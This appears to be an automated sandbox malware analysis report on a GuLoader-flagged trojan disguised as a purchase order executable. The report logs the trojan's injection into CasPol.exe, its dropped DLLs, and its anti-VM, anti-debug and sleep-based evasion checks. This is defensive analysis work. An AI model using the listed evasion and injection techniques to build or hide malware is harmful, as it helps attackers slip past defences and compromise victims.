Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe"
Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe" Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe" Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\PO#4200000866.exe File created: C:\Users\user\AppData\Local\Temp\nshFE95.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/12@4/1
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\PO#4200000866.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404AB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: PO#4200000866.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr
Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb22 source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000008.00000000.41902252759.0000000001120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_715D30C0 push eax; ret 1_2_715D30EE
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7DB69 push ebp; ret 1_2_03C7DB17
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C752A5 push esp; ret 1_2_03C752B5
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A24F push eax; ret 1_2_03C7A254
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C78E64 push ebp; ret 1_2_03C78EAC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C78E72 push ebp; ret 1_2_03C78EAC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70D98 push ebp; ret 1_2_03C70E1A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7BC4B push edi; iretd 1_2_03C7BC67
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7643A push edx; ret 1_2_03C7643B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_01048497 push edi; retn 0000h 8_2_01048499
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_010428E3 push eax; retf 8_2_010428E9
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_715D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_715D1BFF
Drops PE files
Source: C:\Users\user\Desktop\PO#4200000866.exe File created: C:\Users\user\AppData\Local\Temp\library.dll Jump to dropped file
Source: C:\Users\user\Desktop\PO#4200000866.exe File created: C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\PO#4200000866.exe File created: C:\Users\user\AppData\Local\Temp\DeviceServicePlugin.dll Jump to dropped file
Source: C:\Users\user\Desktop\PO#4200000866.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\PO#4200000866.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4436 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\PO#4200000866.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\library.dll Jump to dropped file
Source: C:\Users\user\Desktop\PO#4200000866.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DeviceServicePlugin.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71BC0 rdtsc 1_2_03C71BC0
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9323 Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6B0C40 sldt word ptr [eax] 8_2_1D6B0C40
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PO#4200000866.exe API call chain: ExitProcess graph end node
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000008.00000002.46715733863.0000000001446000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46715072344.00000000013E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_715D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_715D1BFF
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71BC0 rdtsc 1_2_03C71BC0
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B3DE mov eax, dword ptr fs:[00000030h] 1_2_03C7B3DE
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C83362 mov eax, dword ptr fs:[00000030h] 1_2_03C83362
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C832E6 mov eax, dword ptr fs:[00000030h] 1_2_03C832E6
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B28A mov ebx, dword ptr fs:[00000030h] 1_2_03C7B28A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B240 mov ebx, dword ptr fs:[00000030h] 1_2_03C7B240
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B240 mov eax, dword ptr fs:[00000030h] 1_2_03C7B240
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C81E75 mov eax, dword ptr fs:[00000030h] 1_2_03C81E75
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B1CD mov eax, dword ptr fs:[00000030h] 1_2_03C7B1CD
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C815FF mov eax, dword ptr fs:[00000030h] 1_2_03C815FF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7E542 mov eax, dword ptr fs:[00000030h] 1_2_03C7E542
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B168 mov eax, dword ptr fs:[00000030h] 1_2_03C7B168
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B126 mov eax, dword ptr fs:[00000030h] 1_2_03C7B126
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A8DD mov eax, dword ptr fs:[00000030h] 1_2_03C7A8DD
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B080 mov eax, dword ptr fs:[00000030h] 1_2_03C7B080
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B003 mov eax, dword ptr fs:[00000030h] 1_2_03C7B003
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PO#4200000866.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_0104EFC0 LdrInitializeThunk, 8_2_0104EFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\PO#4200000866.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1120000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe" Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
